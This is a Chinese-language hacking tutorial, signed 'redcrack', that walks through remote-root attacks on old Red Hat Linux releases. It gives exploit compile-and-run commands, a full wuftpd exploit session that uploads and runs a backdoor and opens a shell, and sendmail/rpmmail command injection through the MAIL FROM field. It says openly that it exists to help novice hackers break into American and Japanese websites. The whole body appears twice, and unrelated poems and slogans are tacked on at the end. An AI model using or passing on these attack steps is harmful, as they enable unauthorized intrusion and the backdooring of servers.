对已知LINUX和NT入侵的若干方法(工具使用)
------------------------------- write by redcrack---------------------------------------
此篇文章的目的只是为了告诉大家-----没有绝对安全的网站,任何站点都可突破:只是时间问题而已!
写这篇文章也是为了让那些刚入门的国内骇客更好的入侵美日网站
-----------------------------------------------------------------------------------------
redhat 7.0 入侵 (remote root)
redcrack$gcc -o seclpd seclpd.c
redcrack$./SEClpd victim brute -t type
redcrack$./SEClpd victim -t 0 (then try the brute)
redcrack$/.SEClpd viction -t 1(you can )
you can use :lpd-ex.c rdc-lprng.c ypbind.tgz
you can find them in go.163.com/~redcrack/EXPLOITS/OS/LINUX/REDHAT/7.0/index.html
redhat 6.2 入侵(remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
redcrack$gcc -o inndx inndx.c
redcrack$inndx [command [offset]]|nc -i 1 victim 119
redhat 6.1 入侵(remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
另一种方法wuXploit.tgz 通过wuftpd
[wildcoyote@userfriendly wuXploit]$ ls -l
total 13
-rw-r--r-- 1 wildcoyo wildcoyo 1473 Jun 27 18:22 backdoor.c <- evil BD
-rw-rw-r-- 1 wildcoyo wildcoyo 86 Jun 27 18:29 own.sh <- script
-rwxr-xr-x 1 wildcoyo wildcoyo 7037 Jun 27 19:29 readme.txt <- Thiz file
-rwxr-xr-x 1 wildcoyo wildcoyo 5661 Jun 27 19:28 wuXploit.c <- tha c0d3
[wildcoyote@userfriendly wuXploit]$
上载文件
[wildcoyote@userfriendly wuXploit]$ ftp biatx
Connected to biatx.userfriendly.
220 biatx.userfriendly FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
Name (biatx:wildcoyote): wildcoyote
331 Password required for wildcoyote.
Password:
230 User wildcoyote logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /tmp
250 CWD command successful.
ftp> put own.sh
local: own.sh remote: own.sh
200 PORT command successful.
150 Opening BINARY mode data connection for own.sh.
226 Transfer complete.
86 bytes sent in 0.0158 secs (5.3 Kbytes/sec)
ftp> put backdoor.c
local: backdoor.c remote: backdoor.c
200 PORT command successful.
150 Opening BINARY mode data connection for backdoor.c.
226 Transfer complete.
1473 bytes sent in 0.00749 secs (1.9e+02 Kbytes/sec)
ftp> quit
221-You have transferred 1559 bytes in 2 files.
221-Total traffic for this session was 2175 bytes in 2 transfers.
221-Thank you for using the FTP service on biatx.userfriendly.
221 Goodbye.
编译
[wildcoyote@userfriendly wuXploit]$ cc wuXploit.c -o wuXploit
[wildcoyote@userfriendly wuXploit]$
[wildcoyote@userfriendly wuXploit]$ ./wuXploit
WuFtpd Remote/Local Exploit by [email protected]
Sintaxe: ./wuXploit [wuftp port] [backdoor port]
[wildcoyote@userfriendly wuXploit]$ ./wuXploit wildcoyote password /tmp biatx
WuFtpd Remote/Local Exploit by [email protected]
Trying to connect to biatx[21]...SUCCESSFULL
Sending username (wildcoyote)...DONE
Sending password (**********)...DONE
SYST...DONE
TYPE I...DONE
Changing dir to /tmp...DONE
Setting up‘evil‘code :[ ...DONE
Compiling/Running backdoor...DONE
Let‘s delete the EVIL‘entry :[ ...DONE
Oh k! It‘s a WRAP :D
Checking if tha backdoor is up...
Connecting to biatx [5343]...SUCCESS
Tha backdoor is running! ;)
Dr@@ping you to tha own3d shell...
Start typing dewd ;)
id
uid=500(wildcoyote) gid=500(wildcoyote) groups=500(wildcoyote)
ls -l
total 19
-rwxr-xr-x 1 wildcoyo wildcoyo 13572 Jan 1 00:41 backdoor
-rw-r--r-- 1 wildcoyo wildcoyo 1215 Jan 1 00:41 backdoor.c
drwx------ 2 wildcoyo wildcoyo 1024 Jun 25 2000 orbit-wildcoyote
-rw-rw-r-- 1 wildcoyo wildcoyo 86 Jan 1 00:41 own.sh
exit
The connection was closed!
Exiting...
~~~~
通过qib
redcrack$gcc -o qib qib.c
redcrack$ ./qib
redcrack$/qib 10.0.0.50 10.0.0.69 lp0 poopmail.cf dffunkyscript
redcrack$ telnet 10.0.0.69 26092
Trying 10.0.0.69...
Connected to 10.0.0.69.
Escape character is ‘^]‘.
bash$ cat /etc/issue
cat /etc/issue
Red Hat Linux release 6.0 (Hedwig)
Kernel 2.3.25 on an i686
bash$
bash$ id
id
uid=1(bin) gid=0(root) groups=0(root)
bash$
bash$
redhat 6.0 入侵 (remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
通过amd入侵
redcrack$amd-ex
通过pro入侵
redcrack$ cc pro.c -o pro
redcrack$ pro 1.1.1.1 ftp.linuz.com /incoming
通过rpmmail入侵
redcrack$ telnet (host) 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is ‘^]‘.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Sendmail 8.9.3 + RPMmail
redcrack$ telnet (host) 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is ‘^]‘.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost
[127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;@microsoft.com
250 <;/command/to/execute;@microsoft.com> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
redcrack$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is ‘^]‘.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost
[127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok
redhat 5.2 入侵 (remote root)
通过amd入侵
redcrack$amd-ex
此篇文章的目的只是为了告诉大家-----没有绝对安全的网站,任何站点都可突破:只是时间问题而已!
写这篇文章也是为了让那些刚入门的国内骇客更好的入侵美日网站
-----------------------------------------------------------------------------------------
redhat 7.0 入侵 (remote root)
redcrack$gcc -o seclpd seclpd.c
redcrack$./SEClpd victim brute -t type
redcrack$./SEClpd victim -t 0 (then try the brute)
redcrack$/.SEClpd viction -t 1(you can )
you can use :lpd-ex.c rdc-lprng.c ypbind.tgz
you can find them in go.163.com/~redcrack/EXPLOITS/OS/LINUX/REDHAT/7.0/index.html
redhat 6.2 入侵(remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
redcrack$gcc -o inndx inndx.c
redcrack$inndx [command [offset]]|nc -i 1 victim 119
redhat 6.1 入侵(remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
另一种方法wuXploit.tgz 通过wuftpd
[wildcoyote@userfriendly wuXploit]$ ls -l
total 13
-rw-r--r-- 1 wildcoyo wildcoyo 1473 Jun 27 18:22 backdoor.c <- evil BD
-rw-rw-r-- 1 wildcoyo wildcoyo 86 Jun 27 18:29 own.sh <- script
-rwxr-xr-x 1 wildcoyo wildcoyo 7037 Jun 27 19:29 readme.txt <- Thiz file
-rwxr-xr-x 1 wildcoyo wildcoyo 5661 Jun 27 19:28 wuXploit.c <- tha c0d3
[wildcoyote@userfriendly wuXploit]$
上载文件
[wildcoyote@userfriendly wuXploit]$ ftp biatx
Connected to biatx.userfriendly.
220 biatx.userfriendly FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
Name (biatx:wildcoyote): wildcoyote
331 Password required for wildcoyote.
Password:
230 User wildcoyote logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /tmp
250 CWD command successful.
ftp> put own.sh
local: own.sh remote: own.sh
200 PORT command successful.
150 Opening BINARY mode data connection for own.sh.
226 Transfer complete.
86 bytes sent in 0.0158 secs (5.3 Kbytes/sec)
ftp> put backdoor.c
local: backdoor.c remote: backdoor.c
200 PORT command successful.
150 Opening BINARY mode data connection for backdoor.c.
226 Transfer complete.
1473 bytes sent in 0.00749 secs (1.9e+02 Kbytes/sec)
ftp> quit
221-You have transferred 1559 bytes in 2 files.
221-Total traffic for this session was 2175 bytes in 2 transfers.
221-Thank you for using the FTP service on biatx.userfriendly.
221 Goodbye.
编译
[wildcoyote@userfriendly wuXploit]$ cc wuXploit.c -o wuXploit
[wildcoyote@userfriendly wuXploit]$
[wildcoyote@userfriendly wuXploit]$ ./wuXploit
WuFtpd Remote/Local Exploit by [email protected]
Sintaxe: ./wuXploit
[wildcoyote@userfriendly wuXploit]$ ./wuXploit wildcoyote password /tmp biatx
WuFtpd Remote/Local Exploit by [email protected]
Trying to connect to biatx[21]...SUCCESSFULL
Sending username (wildcoyote)...DONE
Sending password (**********)...DONE
SYST...DONE
TYPE I...DONE
Changing dir to /tmp...DONE
Setting up‘evil‘code :[ ...DONE
Compiling/Running backdoor...DONE
Let‘s delete the EVIL‘entry :[ ...DONE
Oh k! It‘s a WRAP :D
Checking if tha backdoor is up...
Connecting to biatx [5343]...SUCCESS
Tha backdoor is running! ;)
Dr@@ping you to tha own3d shell...
Start typing dewd ;)
id
uid=500(wildcoyote) gid=500(wildcoyote) groups=500(wildcoyote)
ls -l
total 19
-rwxr-xr-x 1 wildcoyo wildcoyo 13572 Jan 1 00:41 backdoor
-rw-r--r-- 1 wildcoyo wildcoyo 1215 Jan 1 00:41 backdoor.c
drwx------ 2 wildcoyo wildcoyo 1024 Jun 25 2000 orbit-wildcoyote
-rw-rw-r-- 1 wildcoyo wildcoyo 86 Jan 1 00:41 own.sh
exit
The connection was closed!
Exiting...
~~~~
通过qib
redcrack$gcc -o qib qib.c
redcrack$ ./qib
redcrack$/qib 10.0.0.50 10.0.0.69 lp0 poopmail.cf dffunkyscript
redcrack$ telnet 10.0.0.69 26092
Trying 10.0.0.69...
Connected to 10.0.0.69.
Escape character is ‘^]‘.
bash$ cat /etc/issue
cat /etc/issue
Red Hat Linux release 6.0 (Hedwig)
Kernel 2.3.25 on an i686
bash$
bash$ id
id
uid=1(bin) gid=0(root) groups=0(root)
bash$
bash$
redhat 6.0 入侵 (remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
通过amd入侵
redcrack$amd-ex
通过pro入侵
redcrack$ cc pro.c -o pro
redcrack$ pro 1.1.1.1 ftp.linuz.com /incoming
通过rpmmail入侵
redcrack$ telnet (host) 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is ‘^]‘.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Sendmail 8.9.3 + RPMmail
redcrack$ telnet (host) 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is ‘^]‘.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost
[127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;@microsoft.com
250 <;/command/to/execute;@microsoft.com> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
redcrack$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is ‘^]‘.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost
[127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok
redhat 5.2 入侵 (remote root)
通过amd入侵
redcrack$amd-ex
一节复一节,千枝攒万叶。
我自不开花,免撩蜂与蝶。
.
为人民服务
.
每个人都有自己的想法和方式
没有必要说谁的对,谁的不对
但是,不同的是:我按我认为对的方式生活,我很快乐
她按她认为对的方式生活,她不快乐
.
如果每个人都有善心,那么人间就是天堂